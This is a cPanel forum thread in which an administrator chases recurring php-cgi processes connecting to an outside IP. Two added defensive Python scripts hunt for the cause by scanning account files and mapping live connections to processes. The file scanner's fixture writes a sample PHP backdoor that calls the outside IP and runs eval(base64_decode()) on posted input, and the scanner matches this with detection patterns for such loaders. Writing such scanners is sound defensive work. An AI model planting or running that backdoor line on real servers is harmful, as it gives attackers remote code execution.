

Suspicious process running under user

Discussion in 'Security' started by Alain Bensimon, Apr 23, 2017.

  1. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Hello,
    I have a server with CentOS 7.4.
    My firewall gives me the messages below.
    I run maldet and erase all the threats, and a few days later it comes back.
    I don't know how to prevent these threats.
    Thank you.
    --------------------------------------------------------


    Suspicious process running under user... (always different users)
    Executable:

    /opt/cpanel/ea-php56/root/usr/bin/php-cgi

    Command Line (often faked in exploits):

    /opt/cpanel/ea-php56/root/usr/bin/php-cgi

    Network connections by the process (if any):

    tcp: 192.99.39.58:60352 -> 69.30.221.50:80

    Files open by the process (if any):

    /var/cpanel/locale/en.cdb
     
  2. SysSachin

    SysSachin Well-Known Member

    Joined:
    Aug 23, 2015
    Messages:
    604
    Likes Received:
    42
    Trophy Points:
    28
    Location:
    India
    cPanel Access Level:
    Root Administrator
    The path is valid. It's not a suspicious process, so you have to add this path to the firewall ignore list.
    Please check the same post
    Suspicious process running under
     
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
  4. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Even if the path is valid, I don't think it's legit. I don't understand why accounts would start to launch a bunch of requests.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    Were you able to review my previous response regarding this issue (it's after the initial response you received from another user)?

    Thank you.
     
  6. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    I did, but weirdly the users which are making these connections are not using WordPress.
    I'm really lost and don't know what to do.
     
  7. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    You will sometimes see this type of activity when a PHP script is making a connection to an update server for automatic updates to the script.

    You can review the PHP files uploaded to the account referenced in the notification to see if it's using any specific PHP scripts that make outgoing connections to the referenced IP address. You may also want to reach out to the individual account holder to request information about the activity.

    If you require additional help, you can find a list of system administration services on the following URL:

    System Administration Services | cPanel Forums

    Thank you.
     
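The review cPanelMichael suggests in the post above, done with a script instead of by hand. This is an added example and not code from the thread or from cPanel: it walks an account's home directory looking for PHP files that mention the remote IP from the alert or call the PHP functions that open outbound connections (curl, fsockopen, stream_socket_client, http:// stream wrappers), and also flags eval(base64_decode(...)) style loaders, which is how most PHP backdoors are wrapped. Files are recognised by extension and also by a leading `<?php`, since malware is often dropped under a .jpg or .txt name. The sample account tree, its file names and their contents are constructed here so the script runs offline; the IP is the one from the first post, and the `/home/<user>` layout is a cPanel assumption.

```python
"""
Scan a cPanel account's home directory for PHP files that reference a
given remote IP or call functions that open outbound connections.

Added example, not code from the forum thread or from cPanel. The sample
directory tree and file contents are constructed so the script runs
offline; point scan_account() at a real /home/<user> to use it.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# PHP calls commonly used by scripts that phone home or hide a loader.
OUTBOUND_PATTERNS = {
    "curl":   re.compile(r"\bcurl_(?:init|exec|setopt)\s*\(", re.I),
    "socket": re.compile(r"\b(?:fsockopen|pfsockopen|stream_socket_client|socket_connect)\s*\(", re.I),
    "http":   re.compile(r"\b(?:file_get_contents|fopen)\s*\(\s*['\"]https?://", re.I),
    "loader": re.compile(r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
}

PHP_EXT = (".php", ".phtml", ".php5", ".inc")


def scan_file(path: str, ip: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, reason, line) hits for one file."""
    hits = []
    ip_re = re.compile(re.escape(ip))
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for no, line in enumerate(fh, 1):
                if ip_re.search(line):
                    hits.append((no, "target-ip", line.strip()[:120]))
                for name, rx in OUTBOUND_PATTERNS.items():
                    if rx.search(line):
                        hits.append((no, name, line.strip()[:120]))
    except OSError:
        pass
    return hits


def scan_account(home: str, ip: str) -> Dict[str, List[Tuple[int, str, str]]]:
    """Walk an account home and return {relative_path: hits} for every PHP file
    that has at least one hit. A file counts as PHP if its extension says so
    or if its content starts with '<?php' (disguised names are common)."""
    results = {}
    for root, _dirs, files in os.walk(home):
        for fn in files:
            path = os.path.join(root, fn)
            looks_php = fn.lower().endswith(PHP_EXT)
            if not looks_php:
                try:
                    with open(path, "rb") as fh:
                        looks_php = fh.read(64).lstrip().startswith(b"<?php")
                except OSError:
                    continue
            if looks_php:
                hits = scan_file(path, ip)
                if hits:
                    results[os.path.relpath(path, home)] = hits
    return results


def build_sample_home() -> str:
    """Constructed sample account: a clean index, a plugin that legitimately
    checks an update server, and a backdoor hidden under a .jpg name."""
    home = tempfile.mkdtemp(prefix="acct_")
    files = {
        "public_html/index.php": "<?php echo 'hello'; ?>\n",
        "public_html/wp-content/plugins/upd/check.php":
            "<?php\n$r = file_get_contents('http://updates.example/check');\n",
        "mail/.cache/pic.jpg":
            "<?php\n$h = fsockopen('69.30.221.50', 80);\neval(base64_decode($_POST['c']));\n",
    }
    for rel, body in files.items():
        p = os.path.join(home, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(body)
    return home


if __name__ == "__main__":
    home = build_sample_home()
    for path, hits in scan_account(home, "69.30.221.50").items():
        for no, reason, line in hits:
            print(f"{path}:{no} [{reason}] {line}")
```

Run it as root against `/home/<user>` for the account named in the alert. A hit on the update server of a known plugin (the "http" reason in a plugin directory) is the benign case cPanelMichael describes; a hit under a mail or cache directory, in a file with a non-PHP name, or with the "loader" reason is the kind of file maldet removes and that an attacker re-drops.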
  8. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Actually, these scripts are launched from users that don't even have any activity besides email. No website or anything else. And the script starts multiple processes with the same user, all targeting the same IP.
    And if I suspend the user, a few hours later it starts with another user.
    I also had some who were sending spam, but I disabled mail in PHP, so I don't have this problem anymore.
    I am convinced that it's malicious, but I just don't know how to get rid of it.
     
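The symptom in the post above (several php-cgi processes under one user, all to one IP, and the activity moving to another user after a suspension) is easiest to pin down from the live processes rather than from the alert text, because the alert itself warns that the command line is often faked, and the only open file it listed, /var/cpanel/locale/en.cdb, is a cPanel locale database rather than the script. The script below is an added example, not code from the thread, cPanel or CSF/lfd. It parses `ss -tnp` output to find the PIDs connected to the remote IP and then reads the /proc entries a process cannot rewrite: the real executable, the working directory (for CGI-style PHP normally the directory the script lives in), the owning user and parent PID, and, when PHP runs as plain CGI/suPHP, the SCRIPT_FILENAME the web server passed in the environment. The `ss` output embedded in the block is constructed, as are its process names and PIDs; the IP is the one from the first post.

```python
"""
Find which processes currently hold connections to a remote IP and show
what a php-cgi worker was really running.

Added example, not code from the forum thread, cPanel or CSF. Run as root
so `ss -tnp` fills in the process column and /proc/<pid>/* is readable.
SAMPLE_SS is constructed so the parser can be exercised offline.
"""
import os
import pwd
import re
import subprocess
from typing import Dict, List, Tuple

# Matches both the newer users:(("php-cgi",pid=123,fd=5)) and the older
# users:(("php-cgi",123,5)) formats that ss has printed over the years.
PROC_RE = re.compile(r'users:\(\("([^"]+)",(?:pid=)?(\d+),')


def pids_talking_to(ss_output: str, ip: str, port: int = None) -> List[Tuple[str, int]]:
    """Return (process_name, pid) pairs for sockets whose peer is ip (and port, if given)."""
    found = []
    for line in ss_output.splitlines():
        cols = line.split()
        # Columns: State Recv-Q Send-Q Local:Port Peer:Port [Process]
        if len(cols) < 5 or cols[0] == "State":
            continue
        peer = cols[4]
        matched = (peer == f"{ip}:{port}") if port is not None else peer.startswith(f"{ip}:")
        if not matched:
            continue
        for name, pid in PROC_RE.findall(line):
            found.append((name, int(pid)))
    return found


def describe_pid(pid: int) -> Dict[str, str]:
    """Pull the facts a faked argv cannot hide from /proc/<pid>."""
    base = f"/proc/{pid}"
    info: Dict[str, str] = {"pid": str(pid)}

    def link(name: str) -> str:
        try:
            return os.readlink(f"{base}/{name}")
        except OSError as e:
            return f"<{e.strerror}>"

    info["exe"] = link("exe")   # the real binary, even if argv[0] was rewritten
    info["cwd"] = link("cwd")   # usually the directory the script was started from
    try:
        with open(f"{base}/cmdline", "rb") as fh:
            info["cmdline"] = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
        with open(f"{base}/status") as fh:
            for ln in fh:
                if ln.startswith(("PPid:", "Uid:")):
                    key, val = ln.split(":", 1)
                    info[key.lower()] = val.split()[0]
        info["user"] = pwd.getpwuid(int(info["uid"])).pw_name
        # Plain CGI / suPHP pass the request variables in the environment;
        # under FastCGI they travel over the socket, so these may be absent.
        with open(f"{base}/environ", "rb") as fh:
            for item in fh.read().split(b"\0"):
                if item.startswith((b"SCRIPT_FILENAME=", b"DOCUMENT_ROOT=", b"REQUEST_URI=")):
                    k, v = item.decode(errors="replace").split("=", 1)
                    info[k] = v
    except (OSError, KeyError, ValueError) as e:
        info["error"] = str(e)
    return info


# Constructed `ss -tnp` output: two php-cgi workers to the IP from the alert,
# plus unrelated httpd and exim sockets (the exim line uses the old format).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
ESTAB 0      0      192.99.39.58:60352   69.30.221.50:80    users:(("php-cgi",pid=20311,fd=5))
ESTAB 0      0      192.99.39.58:60354   69.30.221.50:80    users:(("php-cgi",pid=20314,fd=5))
ESTAB 0      0      192.99.39.58:443     203.0.113.7:51022  users:(("httpd",pid=1401,fd=12))
ESTAB 0      0      192.99.39.58:25      198.51.100.9:40211 users:(("exim",2230,4))
"""


def main(ip: str) -> None:
    out = subprocess.run(["ss", "-tnp"], capture_output=True, text=True, check=False).stdout
    for name, pid in pids_talking_to(out, ip):
        print(f"== {name} pid {pid}")
        for k, v in describe_pid(pid).items():
            print(f"   {k:16} {v}")


if __name__ == "__main__":
    # Offline demo on the constructed sample; on the server call main("69.30.221.50").
    print(pids_talking_to(SAMPLE_SS, "69.30.221.50"))
```

Once cwd or SCRIPT_FILENAME gives you the script path, look for the same file (or the same contents under a different name) in the other accounts and in any world-writable directory such as /tmp, since in this thread the activity reappears under a new user after each suspension; a shared entry point (a cron entry, a writable directory, or one compromised account with access to the others) is more likely than independent infections.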
  9. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    I recommend seeking out assistance from a qualified system administrator if you'd like further investigation into what could be causing the issue on the affected server. We provide a list of companies offering system administration services in the URL from my last response.

    Thank you.
     
  10. Alain Bensimon

    Joined:
    Apr 23, 2017
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Canada
    cPanel Access Level:
    Root Administrator
    Can you recommend one of them to me, please?
     
  11. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,660
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    It's against our policy to recommend a specific vendor, but you are welcome to search their company names on a search engine or another forum such as WebHostingTalk to see if you can find existing reviews.

    Thank you.
     